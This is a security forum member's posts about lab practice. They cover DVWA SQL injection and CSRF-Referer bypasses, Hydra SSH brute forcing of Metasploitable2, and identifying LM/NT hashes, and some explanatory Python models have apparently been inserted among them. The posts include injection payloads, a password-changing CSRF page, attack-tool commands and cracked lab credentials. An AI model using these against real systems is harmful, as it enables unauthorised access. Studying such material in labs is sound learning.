
pierre (Active Members, 106 posts)

Posts posted by pierre

  1. On 24/6/2016 at 3:01 PM, digininja said:

    The escape string function is protecting the statement from exploitation; if it failed then the statement would no longer be protected. Imagine this over the whole of the internet.

    You meant:

    The escape string function is protecting the statement from exploitation; if the "escape string function" failed then the statement would no longer be protected. Imagine this over the whole of the internet.

    Which I answer:

    Yes, but "if the escape string statement failed" shouldn't be considered with such a function, no?

  2. Here is my sqlninja conf file for the GET method:

    root@osboxes:~# more sql_get.conf
    --httprequest_start--

    GET http://192.168.1.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#';__SQL2INJECT__ HTTP/1.0
    Host: 192.168.1.1
    User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
    Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png,*/*
    Accept-Language: en-us, en; q=0.7, it;q=0.3
    Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7
    Content-Type: application/x-www-form-urlencoded
    Cookie: security=low; PHPSESSID=k4ooe285n9nco1a3kj01p0hv93
    Connection: close

    --httprequest_end--


    For this topology:

    [attached image: top5.png]

    But yes, I am on MySQL; maybe that is the problem..

  3. Hello,

    I would like to get started with sqlninja: http://sqlninja.sourceforge.net/

    I am already following this tutorial: http://techotweak.blogspot.fr/2015/05/what-is-sql-injection-and-how-to-use.html

    But my injection is located at this URL: http://192.168.1.1/DVWA/vulnerabilities/sqli/?

    So I can't use the same file parameters ... and it fails :(

    root@osboxes:~# sqlninja -mt -f sql_get.conf
    Sqlninja rel. 0.2.6-r1
    Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
    [+] Parsing sql_get.conf...
    [-] HTTP request not defined in sql_get.conf
        Are you sure you are not using a configuration file of a previous version?
        Starting from version 0.2.6, the syntax has changed. See documentation

    Has someone ever succeeded in using this tool? :)

  4. Yes, exactly!! I tried to escape something that I didn't have to; moreover, I didn't have to encode my SQLi.

    Low level:

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

    Medium level: 

     $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";

    So in the medium level, our value isn't surrounded by quotes, so we don't have to put any :)

    But if the medium level were:

    $id = mysql_real_escape_string( $id );
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

    Would it have been impossible to do SQLi?

  5. On 17/6/2016 at 0:37 PM, digininja said:

    Simply intercept the request in Burp and add or edit the header before the request is passed on.

    Yes, but a client who has been redirected by a hacker webserver isn't supposed to be using Burp.

     

    On 18/6/2016 at 1:19 AM, fugu said:

    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

    I think this is the solution to that challenge, if I'm not mistaken.

    Ok I'll change my hacker webserver DNS. :)

    EDIT: setting the Referer header to 192.168.1.1 or http://192.168.1.1 makes it work :)

  6. On 17/6/2016 at 5:31 PM, digininja said:

    No. The whole point of the function is to prevent injection. If someone found a bypass then it would open holes in so many apps that it would be patched within hours if not quicker.

    Yes, but if it is at the "Medium" level on DVWA, doesn't that indicate that it might be bypassed?

    EDIT: I've succeeded in bypassing this evasion function, but I don't know why...

    Here is the original SQLi I want to pass:

    1' OR '1'='1

    I encode the space and the equals sign in hexadecimal but not the apostrophe, and it works (http://www.asciitable.com/):

    Encoded SQLi: 1%20OR%201%3D1

    My question is the following: why does the SQLi work even if I don't have an apostrophe in it?

    Is it because the equals sign and the space aren't affected by mysql_real_escape_string()?

    Cf: http://php.net/manual/en/function.mysql-real-escape-string.php

    mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a.

  7. Hello,

    I was wondering if someone has ever bypassed the function mysql_real_escape_string

    "mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a. "

    For example, I want to input the classic 1' or '1'='1 in a variable wrapped by the mysql_real_escape_string function.

    Is it possible?

    EDIT: even sqlmap doesn't manage it!!

    root@osboxes:/var/www/html# sqlmap -u "http://192.168.1.1/DVWA/vulnerabilities/sqli/#" --cookie="security=medium; PHPSESSID=u669kpihv3tsblhrgqo21lcu71"

    [...]

    [11:06:43] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
    [11:06:43] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 222 times

    [*] shutting down at 11:06:43
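    What this post and the two follow-ups further up the page (where 1%20OR%201%3D1 works at the medium level) come down to, as an added Python model that is not from DVWA or the posts: escaping protects a quoted string literal, but in the medium query the value is interpolated without quotes, so an escaped 1 OR 1=1 still rewrites the WHERE clause; the fix in a numeric context is to validate the integer and bind it as a parameter. The escape function here is a simplified stand-in covering only the seven characters the PHP manual lists.

```python
import re

# Characters mysql_real_escape_string() prefixes with a backslash (the PHP manual list quoted in the post).
_ESCAPE = {"\x00": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
           "'": "\\'", '"': '\\"', "\x1a": "\\Z"}

def mysql_real_escape_string(value: str) -> str:
    """Simplified stand-in for the PHP function: those seven characters and nothing else."""
    return "".join(_ESCAPE.get(ch, ch) for ch in value)

def build_low(user_id: str) -> str:
    # DVWA low: raw value inside single quotes
    return f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}';"

def build_low_escaped(user_id: str) -> str:
    # The hypothetical from the post: escaped AND quoted
    return f"SELECT first_name, last_name FROM users WHERE user_id = '{mysql_real_escape_string(user_id)}';"

def build_medium(user_id: str) -> str:
    # DVWA medium: escaped but interpolated without quotes (numeric context)
    return f"SELECT first_name, last_name FROM users WHERE user_id = {mysql_real_escape_string(user_id)};"

def build_hardened(user_id: str) -> tuple:
    """Numeric context done right: validate as an integer, then bind it as a parameter."""
    if not re.fullmatch(r"\d+", user_id):
        raise ValueError("user_id must be an integer")
    return ("SELECT first_name, last_name FROM users WHERE user_id = %s;", (int(user_id),))

def hardened_accepts(user_id: str) -> bool:
    try:
        build_hardened(user_id)
        return True
    except ValueError:
        return False

def where_is_single_literal(query: str) -> bool:
    """Crude oracle: is user_id compared against exactly one literal (quoted string with
    backslash escapes, or a bare integer) and nothing more? False means the input changed the SQL."""
    m = re.search(r"WHERE user_id = (.*);$", query)
    return bool(m) and re.fullmatch(r"'(?:[^'\\]|\\.)*'|\d+", m.group(1)) is not None

if __name__ == "__main__":
    for label, q in [("low, quoted payload", build_low("1' OR '1'='1")),
                     ("low+escape, quoted payload", build_low_escaped("1' OR '1'='1")),
                     ("medium, unquoted payload", build_medium("1 OR 1=1"))]:
        print(f"{label:28} intact={where_is_single_literal(q)}  {q}")
```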

     

  8. 18 hours ago, digininja said:

    In two, how do you get from the first page to the second?

    Simply by navigating on the website.

    But another interesting thing: from the W7 host, I run this HTML page with JavaScript included:

    <html>
    <head>
    	<title>Yo</title>
    </head>
    <body bgcolor=white>
    <script>
    	window.onload = function(){
    			window.open("http://192.168.1.1/DVWA/vulnerabilities/csrf/test.php");
    			window.open("http://192.168.1.1/DVWA/vulnerabilities/csrf/?password_new=test&password_conf=test&Change=Change");
    	}
    </script>
    </body>
    </html>

    test.php is a page to compare the HTTP_REFERER and SERVER_NAME global variables; it prints this:

    Hello you come from ! Hello you come from 192.168.1.1 ! Different IPs     -> no HTTP_REFERER IP detected, blank

    That request didn't look correct. -> it means I can't change the login/password because of the HTTP_REFERER restriction, even if HTTP_REFERER is blank..

    4 hours ago, fugu said:

    Don't ereg and eregi use regular expressions? If you have control of what will end up in the referrer field, couldn't you try and make the referrer a very widely encompassing regex like .* or something? I'm not sure the * is valid in the hostname location but maybe you can figure something out.

    Yes, the point here is to bypass the HTTP_REFERER restriction; on one client I can use the Burp proxy :)

    But on a client who has been redirected to the website by another webserver, I don't know how to bypass the HTTP_REFERER header..

     

     

  9. 1) I go to the page directly -> HTTP_REFERER=BLANK

    2) I go from http://192.168.1.1/DVWA/index.php to http://192.168.1.1/DVWA/vulnerabilities/csrf/test.php -> HTTP_REFERER=BLANK

    3) I go from http://192.168.0.1/index.html to http://192.168.1.1/DVWA/vulnerabilities/csrf/test.php -> HTTP_REFERER=192.168.0.1

    So do you know why, in the 2nd situation, the HTTP_REFERER header is still blank?

  10. 21 hours ago, fugu said:

    i don't know if you have the ability to modify the code, but if you can add

    
    echo "<pre><code>"; var_dump($_SERVER); echo "</code></pre>";

    will let you examine all the various header entries that are stored in the $_SERVER variable during your request.

    Yes, I tested with this code:

    <html>
     <head>
      <title>PHP Test</title>
     </head>
     <body>
     <?php
            echo ('Hello you come from '.$_SERVER['HTTP_REFERER'].' ! ');
            echo ('Hello you come from '.$_SERVER['SERVER_NAME'].' ! ');
    
            if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )
            {
                    echo("Same IPs");
            }
            else
            {
                    echo("Different IPs");
            }
    
     ?>
    
     </body>
    </html>
    

    I just fucking don't know how to add a new line in PHP, but it works, never mind :)

    22 hours ago, digininja said:

    From the URL I sent

    yes, it compares the two values using regular expressions.

    The check is if the referrer, the page you are coming from, is on the same host as the page you are going to (technically not quite that but close enough), meaning HTTP_REFERER has to include SERVER_NAME for the match and so the code to get executed.

    Yes, but my HTTP_REFERER is either blank or the IP of my hacker webserver (Kali) when the W7 host clicks on my Kali webserver to be redirected to the Ubuntu webserver (CSRF):

    Cf.:

    [attached image: topo.png]

    I'm well blocked by the protection:

    if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )

    I am planning how to inject an HTTP_REFERER value in an HTTP request to bypass the boolean protection above!

     

  11. Yes, I've googled; is it a comparison function?

    Yes, it is the medium protection.

    Ah, because in my test either HTTP_REFERER is the pirate web server's IP or the field is blank...

    So HTTP_REFERER could be equal to SERVER_NAME?

  12. Hello,

    I'm learning how CSRF works.

    On DVWA, at medium level, here is part of the correction provided:

            // Checks to see where the request came from
            if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )

    Do you know what the eregi() function is used for?

    I think SERVER_NAME is my server's IP?

    But what is http_referer ?
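    The referer check discussed in this post and the CSRF posts above (the eregi() line, the test.php results, and the EDIT where a bare 192.168.1.1 Referer passes), as an added Python model that is not from DVWA or the posts: eregi() is a case-insensitive regex search for SERVER_NAME inside HTTP_REFERER, so a request with no Referer can never pass and any Referer containing the server name does; strict_referer_check parses the Referer and compares the host exactly. The scenario headers are constructed; the Referer check is a weak mitigation either way, and the OWASP cheat sheet linked above recommends a per-session anti-CSRF token.

```python
import re
from urllib.parse import urlsplit

def eregi_referer_check(server_name: str, http_referer: str) -> bool:
    """Model of DVWA's eregi($_SERVER['SERVER_NAME'], $_SERVER['HTTP_REFERER']): a case-insensitive
    regex search for SERVER_NAME anywhere inside the Referer. An empty Referer can never match, and a
    Referer that merely contains the server name (it is a substring search) always does."""
    return re.search(server_name, http_referer, re.IGNORECASE) is not None

def strict_referer_check(server_name: str, http_referer: str) -> bool:
    """Tighter check: require a Referer, parse it as a URL and compare the host exactly.
    A bare host with no scheme (the post's 'Referer: 192.168.1.1') is parsed too."""
    if not http_referer:
        return False
    parts = urlsplit(http_referer if "://" in http_referer else "//" + http_referer)
    return (parts.hostname or "").lower() == server_name.lower()

# Constructed Referer values for the situations described in the posts:
# 192.168.1.1 is the DVWA host, 192.168.0.1 the other (attacker-side) webserver.
SCENARIOS = {
    "direct, no Referer": "",
    "same host, full URL": "http://192.168.1.1/DVWA/index.php",
    "bare host (EDIT in post)": "192.168.1.1",
    "other webserver": "http://192.168.0.1/index.html",
}

def evaluate(server_name: str = "192.168.1.1") -> dict:
    """Map each scenario to (eregi result, strict result)."""
    return {name: (eregi_referer_check(server_name, ref), strict_referer_check(server_name, ref))
            for name, ref in SCENARIOS.items()}

if __name__ == "__main__":
    for name, (lenient, strict) in evaluate().items():
        print(f"{name:26} eregi={lenient!s:5} strict={strict}")
```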

     

  13. No, even for -t 16 I have:

    [DATA] max 16 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~0 tries per task

    But I got these shitty lines:

    The session file ./hydra.restore was written. Type "hydra -R" to resume session.
    The session file ./hydra.restore was written. Type "hydra -R" to resume session.
    The session file ./hydra.restore was written. Type "hydra -R" to resume session.

    So I think 6-8 is the right number of threads to run Hydra with.

  14. I listened to the prompt and changed my command:

    root@osboxes:~# hydra -L user.old -P pass.old 192.168.0.2 ssh -t 4
    Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-14 04:52:22
    [DATA] max 4 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~1 try per task
    [DATA] attacking service ssh on port 22
    [22][ssh] host: 192.168.0.2   login: klog   password: 123456789
    [22][ssh] host: 192.168.0.2   login: msfadmin   password: msfadmin
    [STATUS] 141.00 tries/min, 141 tries in 00:01h, 139 todo in 00:01h, 4 active
    [22][ssh] host: 192.168.0.2   login: service   password: service
    [22][ssh] host: 192.168.0.2   login: sys   password: batman
    [STATUS] 137.50 tries/min, 275 tries in 00:02h, 5 todo in 00:01h, 4 active
    1 of 1 target successfully completed, 4 valid passwords found
    Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-14 04:54:26

    This time all credentials were found!!

    Adding the option -t 4 to my command :)

          -t TASKS
                  run TASKS number of connects in parallel (default: 16)

    Does it have something to do with the parallel tasks in the processor?

    I've done some tests:

    -t 6 gives the same good result within 1m24s.

    -t 8 gives the same good result within 57s.

    -t 10 gives the same good result within 50s.

    -t 11 gives a wrong result within 54s, omitting 2/4 credentials.

     

    And at -t 11 I got the warning:

    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 11 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~0 tries per task

    There is something scientific behind all this, I'm sure!

     

  15. Hello,

    I work with Hydra on metasploitable2.

    I have the Metasploitable account credentials in two files, "user" and "pass".

    I just want to know which accounts have SSH rights configured, so I brute-force.

    Three accounts have SSH access on the target:

    root@osboxes:~# ssh sys@192.168.0.2
    sys@192.168.0.2's password:
    sys@metasploitable:~$ exit
    logout

    root@osboxes:~# ssh msfadmin@192.168.0.2
    msfadmin@192.168.0.2's password:
    msfadmin@metasploitable:~$ exit
    logout

    root@osboxes:~# ssh service@192.168.0.2
    service@192.168.0.2's password:
    service@metasploitable:~$ exit
    logout

    Now I want to bruteforce with Hydra:

    root@osboxes:~# more user
    sys
    klog
    msfadmin
    service

    root@osboxes:~# more pass
    service
    msfadmin
    123456789
    batman

    And here is my Hydra command and the result:

    root@osboxes:~# hydra -L user -P pass 192.168.0.2 ssh
    Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-13 11:18:39
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 16 tasks per 1 server, overall 64 tasks, 16 login tries (l:4/p:4), ~0 tries per task
    [DATA] attacking service ssh on port 22
    [22][ssh] host: 192.168.0.2   login: service   password: service
    [22][ssh] host: 192.168.0.2   login: msfadmin   password: msfadmin
    [22][ssh] host: 192.168.0.2   login: klog   password: 123456789
    1 of 1 target successfully completed, 3 valid passwords found
    Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-13 11:18:42

    Hydra is recovering the passwords, but not for the right accounts.. It omits the account "sys:batman"; do you know why?

  16. I've succeeded in cracking this hash: e52cac67419a9a224a3b108f3fa6cb6d -> PASSWORD, so it may be the user's password

    However, I don't succeed with this hash 8846f7eaee8fb117ad06bdd830b7586c.... so I don't know what it should be used for..

    Do you think the 2nd is the salt?

    I don't suppose so, because I am on a Windows XP system

  17. Hello,

    I've dumped the hashes on my XP VM and here is the output:

    user:1004:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::


    In Linux it is like /etc/passwd with 7 fields:

    Username:Password:User ID:Group ID:User ID Info:Home directory:Command/shell

    Here we also have 7 fields, but it's like:

    Username:User ID:HASH:HASH:::

    Do you know what the two hashes are?
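    The two posts on the XP hash dump (this one and the one just above), as an added Python example that is not from the original posts: it splits the pwdump record into its fields and recomputes the second hash. In that format the fields are username:RID:LM hash:NT hash:::; the first hash is the LM hash, computed over the uppercased password (hence the cracked "PASSWORD"), and the second is the NT hash, MD4 over the UTF-16LE password, not a salt. It assumes the password is "password" and carries a pure-Python MD4 because hashlib's md4 is often unavailable.

```python
import struct

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash exists (LM disabled or >14 chars)

def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK

def _md4_round(state, x, f, order, shifts, const):
    a, b, c, d = state
    for i, k in enumerate(order):
        a = _rotl((a + f(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
        a, b, c, d = d, a, b, c   # rotate roles so the next step updates the next register
    return a, b, c, d

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 needs OpenSSL's legacy provider."""
    state = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = _md4_round(state, x, lambda p, q, r: (p & q) | (~p & r), range(16), (3, 7, 11, 19), 0)
        s = _md4_round(s, x, lambda p, q, r: (p & q) | (p & r) | (q & r),
                       (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999)
        s = _md4_round(s, x, lambda p, q, r: p ^ q ^ r,
                       (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1)
        state = tuple((u + v) & MASK for u, v in zip(state, s))
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE password; case-sensitive and unsalted, so equal passwords hash equal."""
    return md4(password.encode("utf-16-le")).hex()

def parse_pwdump(line: str) -> dict:
    """Split a pwdump record: username:RID:LM hash:NT hash::: (the last three fields are empty)."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
            "lm_disabled": lm.lower() == EMPTY_LM}

def nt_matches(line: str, candidate: str) -> bool:
    """True when the record's NT field is the NT hash of the candidate password."""
    return parse_pwdump(line)["nt"] == nt_hash(candidate)

# The record from the post (XP VM dump).
RECORD = "user:1004:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::"

if __name__ == "__main__":
    print(parse_pwdump(RECORD))
    print("NT field is NT('password'):", nt_matches(RECORD, "password"))
```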
